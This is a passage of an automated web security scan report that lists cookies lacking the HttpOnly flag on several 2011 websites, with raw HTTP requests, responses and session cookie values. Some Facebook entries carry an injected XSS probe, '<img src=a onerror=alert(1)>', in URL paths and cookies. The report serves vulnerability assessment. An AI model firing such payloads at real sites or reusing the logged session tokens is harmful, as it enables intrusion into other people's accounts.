11.25. http://www.mmawarehouse.com/Xtreme-Couture-Randy-Couture-UFC-129-Walkout-Tee-p/xtc-1020.htm

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mmawarehouse.com
Path:   /Xtreme-Couture-Randy-Couture-UFC-129-Walkout-Tee-p/xtc-1020.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • ASPSESSIONIDCASTQSBA=IDIDGODBDNKIGNLKGFIAJFAI; path=/
  • History50=33949; expires=Fri, 20-May-2011 07:00:00 GMT; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Xtreme-Couture-Randy-Couture-UFC-129-Walkout-Tee-p/xtc-1020.htm HTTP/1.1
Host: www.mmawarehouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:58:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 70569
Content-Type: text/html
Set-Cookie: vsettings=; expires=Sun, 29-Apr-2012 07:00:00 GMT; path=/
Set-Cookie: History50=33949; expires=Fri, 20-May-2011 07:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDCASTQSBA=IDIDGODBDNKIGNLKGFIAJFAI; path=/
Cache-control: private
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:fb="http://www.facebook.com
...[SNIP]...

11.26. http://www.truveo.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.truveo.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • PHPSESSID=l7a2hsj410v4vqu1e6743unjl4; path=/
  • ab=univ_ent; expires=Thu, 31-Dec-2015 05:00:00 GMT; path=/; domain=.truveo.com
  • queryhistory=deleted; expires=Wed, 05-May-2010 00:58:21 GMT; path=/; domain=.truveo.com
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.truveo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ab=univ_ent; showAdult=0; unique=c2463cfb4c02503-f77cacedeed180d; PHPSESSID=l7a2hsj410v4vqu1e6743unjl4

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:58:22 GMT
Server: Apache
X-Powered-By: PHP/5.1.3
Set-Cookie: ab=univ_ent; expires=Thu, 31-Dec-2015 05:00:00 GMT; path=/; domain=.truveo.com
Set-Cookie: queryhistory=deleted; expires=Wed, 05-May-2010 00:58:21 GMT; path=/; domain=.truveo.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=l7a2hsj410v4vqu1e6743unjl4; path=/
Access-Control-Allow-Oritin: *
Content-Type: text/html; charset=utf-8
Content-Length: 83513

<!DOCTYPE HTML>
<html class="no-js">
<head>
<title>Truveo Video Search</title>
<script type="text/javascript">
<!--
SpriteImg = new Image();
SpriteImg.src = "http://www.truveo.com/client/versions/uni
...[SNIP]...

11.27. http://www.truveo.com/search

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.truveo.com
Path:   /search

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • PHPSESSID=q63egmjqep6m7rjtv5e7epons1; path=/
  • unique=770f667cc0f81d1-7132dc48a8cf32a; expires=Sun, 02-May-2021 00:57:00 GMT; path=/; domain=.truveo.com
  • ab=univ_ent; expires=Thu, 31-Dec-2015 05:00:00 GMT; path=/; domain=.truveo.com
  • unique=9859c0e0799d06e-bf4dcf15a92aa35; expires=Sun, 02-May-2021 00:57:00 GMT; path=/; domain=.truveo.com
  • queryhistory=deleted; expires=Wed, 05-May-2010 00:56:59 GMT; path=/; domain=.truveo.com
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search HTTP/1.1
Host: www.truveo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 00:57:00 GMT
Server: Apache
X-Powered-By: PHP/5.1.3
Set-Cookie: unique=770f667cc0f81d1-7132dc48a8cf32a; expires=Sun, 02-May-2021 00:57:00 GMT; path=/; domain=.truveo.com
Set-Cookie: ab=univ_ent; expires=Thu, 31-Dec-2015 05:00:00 GMT; path=/; domain=.truveo.com
Set-Cookie: showAdult=0; expires=Sat, 04-Jun-2011 00:57:00 GMT; path=/; domain=.truveo.com
Set-Cookie: unique=9859c0e0799d06e-bf4dcf15a92aa35; expires=Sun, 02-May-2021 00:57:00 GMT; path=/; domain=.truveo.com
Set-Cookie: queryhistory=deleted; expires=Wed, 05-May-2010 00:56:59 GMT; path=/; domain=.truveo.com
Set-Cookie: PHPSESSID=q63egmjqep6m7rjtv5e7epons1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: http://www.truveo.com/
Access-Control-Allow-Oritin: *
Content-Type: text/html; charset=utf-8
Content-Length: 105095

<!DOCTYPE HTML>
<html class="no-js">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<link title="Truveo Video Search" type="application/opensearchdescription+xml" rel
...[SNIP]...

11.28. http://yellowpages.aol.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://yellowpages.aol.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • JSESSIONID=17224104F8E073DB96F56D00E1212059; Path=/yellowpages
  • sess_id=3fd40c2ad4939b38; Domain=yellowpages.aol.com; Expires=Thu, 05-May-2011 01:29:15 GMT; Path=/
  • reqId=ae3b17aa1bed2d84; Domain=yellowpages.aol.com; Path=/
  • local_guid=7b579074211441ec; Domain=yellowpages.aol.com; Expires=Fri, 04-May-2012 00:59:15 GMT; Path=/
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?icid=navbar_YP_main5 HTTP/1.1
Host: yellowpages.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304575100634-Repeat%7C1367647100634%3B%20s_nrgvo%3DRepeat%7C1367647100636%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:59:14 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=17224104F8E073DB96F56D00E1212059; Path=/yellowpages
Set-Cookie: recentSearches=; Domain=yellowpages.aol.com; Expires=Fri, 04-May-2012 00:59:15 GMT; Path=/
Set-Cookie: recentlocations=; Domain=yellowpages.aol.com; Expires=Fri, 04-May-2012 00:59:15 GMT; Path=/
Set-Cookie: reqId=ae3b17aa1bed2d84; Domain=yellowpages.aol.com; Path=/
Set-Cookie: sess_id=3fd40c2ad4939b38; Domain=yellowpages.aol.com; Expires=Thu, 05-May-2011 01:29:15 GMT; Path=/
Set-Cookie: local_guid=7b579074211441ec; Domain=yellowpages.aol.com; Expires=Fri, 04-May-2012 00:59:15 GMT; Path=/
Content-Length: 38832

<?xml version="1.0" encoding="UTF-8" ?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...

11.29. http://www.citysbest.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citysbest.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 01:58:36 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?icid=navbar_citysbest_main5 HTTP/1.1
Host: www.citysbest.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:58:36 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 01:58:36 GMT; path=/
Content-Type: text/html
Content-Length: 15501

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...

11.30. http://www.dailyfinance.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dailyfinance.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • GEO-173_193_214_243_64_12_75_136=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 11:56:29 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243_64_12_173_49=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; AOL_StockQuotesLiveUpdate=1; s_pers=%20s_getnr%3D1304575093082-New%7C1367647093082%3B%20s_nrgvo%3DNew%7C1367647093084%3B; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.95b2; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.95b2;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:56:29 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243_64_12_75_136=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 11:56:29 GMT; path=/
Keep-Alive: timeout=5, max=999998
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 127215

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org/1999/xhtml" xml:
...[SNIP]...

11.31. http://www.dailyfinance.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dailyfinance.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • GEO-173_193_214_243_64_12_173_49=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 01:58:33 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?icid=navbar_finance_main5 HTTP/1.1
Host: www.dailyfinance.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:58:33 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243_64_12_173_49=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 01:58:33 GMT; path=/
Content-Type: text/html
Content-Length: 126939

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org/1999/xhtml" xml:
...[SNIP]...

11.32. http://www.everydayhealth.com/allergy/climate-change-and-allergies.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.everydayhealth.com
Path:   /allergy/climate-change-and-allergies.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • .ASPXANONYMOUS=AcxBpO4hyeM5MDY2ODIwZC0xMWZhLTRjODktOGQzNS03NzFlZGNmNzhkODY1; expires=Wed, 13-Jul-2011 21:36:31 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /allergy/climate-change-and-allergies.aspx HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:56:31 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpO4hyeM5MDY2ODIwZC0xMWZhLTRjODktOGQzNS03NzFlZGNmNzhkODY1; expires=Wed, 13-Jul-2011 21:36:31 GMT; path=/
Set-Cookie: ASP.NET_SessionId=ahsac155xnki2v55pzjexlmb; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49105


<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

<head id="head"><title>
   Can Climate Change Cause Allergy? - Allergy Center - Every
...[SNIP]...

11.33. http://www.everydayhealth.com/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.everydayhealth.com
Path:   /heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • .ASPXANONYMOUS=AcxBpO6Y*xNkN2I5MjVjYi05YzUzLTRhY2MtYjcwOC03ZmQxMjAzMTMxNGU1; expires=Wed, 13-Jul-2011 21:36:32 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:56:32 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpO6Y*xNkN2I5MjVjYi05YzUzLTRhY2MtYjcwOC03ZmQxMjAzMTMxNGU1; expires=Wed, 13-Jul-2011 21:36:32 GMT; path=/
Set-Cookie: ASP.NET_SessionId=esw2jyaebe5e2r55rhgfig45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49627


<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

<head id="head"><title>
   Is Cholesterol Treatment Worth It? - EverydayHealth.com
<
...[SNIP]...

11.34. http://www.everydayhealth.com/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.everydayhealth.com
Path:   /kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • .ASPXANONYMOUS=AcxBpO7eIwsxNDRhNTExOC0xODcxLTQwN2ItYmNjOS1kZDk5OTdlYTE1N2I1; expires=Wed, 13-Jul-2011 21:36:32 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:56:32 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpO7eIwsxNDRhNTExOC0xODcxLTQwN2ItYmNjOS1kZDk5OTdlYTE1N2I1; expires=Wed, 13-Jul-2011 21:36:32 GMT; path=/
Set-Cookie: ASP.NET_SessionId=ytmqve451nrbiy55ltp0oe55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48908


<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

<head id="head"><title>
   TVs Common in Daycare Centers Despite Guidelines - Kids' H
...[SNIP]...

11.35. http://www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.everydayhealth.com
Path:   /sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • .ASPXANONYMOUS=AcxBpO9S9eM0ZDUxYzkzYi0zMDJmLTQwYmYtOTcwNC1mNDg4N2I4MDBiZmM1; expires=Wed, 13-Jul-2011 21:36:33 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:56:33 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpO9S9eM0ZDUxYzkzYi0zMDJmLTQwYmYtOTcwNC1mNDg4N2I4MDBiZmM1; expires=Wed, 13-Jul-2011 21:36:33 GMT; path=/
Set-Cookie: ASP.NET_SessionId=tew4lhmlby1awfarbc5plyur; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47316


<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

<head id="head"><title>
   3 Ways to Put the Wow! Back in Your Sex Life - Sexual Heal
...[SNIP]...

11.36. http://www.facebook.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.181.69
Connection: close
Date: Thu, 05 May 2011 11:43:08 GMT
Content-Length: 30906

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

11.37. http://www.facebook.com/10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • lsd=hrTlo; path=/; domain=.facebook.com
  • reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; path=/; domain=.facebook.com
  • reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; path=/; domain=.facebook.com
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; path=/; domain=.facebook.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://burp/show/11
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 404 Not Found
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: lsd=hrTlo; path=/; domain=.facebook.com
Set-Cookie: reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.40.55
X-Cnection: close
Date: Thu, 05 May 2011 11:29:43 GMT
Content-Length: 11493

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

11.38. http://www.facebook.com/10000082482078341583

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /10000082482078341583<img%20src=a%20onerror=alert(1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /10000082482078341583<img%20src=a%20onerror=alert(1 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 404 Not Found
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.139.31
Connection: close
Date: Thu, 05 May 2011 11:43:13 GMT
Content-Length: 11422

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

11.39. http://www.facebook.com/10000082482078341583ab0e5e0e0bd

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /10000082482078341583<img%20src=a%20onerror=alert(1)>ab0e5e0e0bd

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /10000082482078341583<img%20src=a%20onerror=alert(1)>ab0e5e0e0bd HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
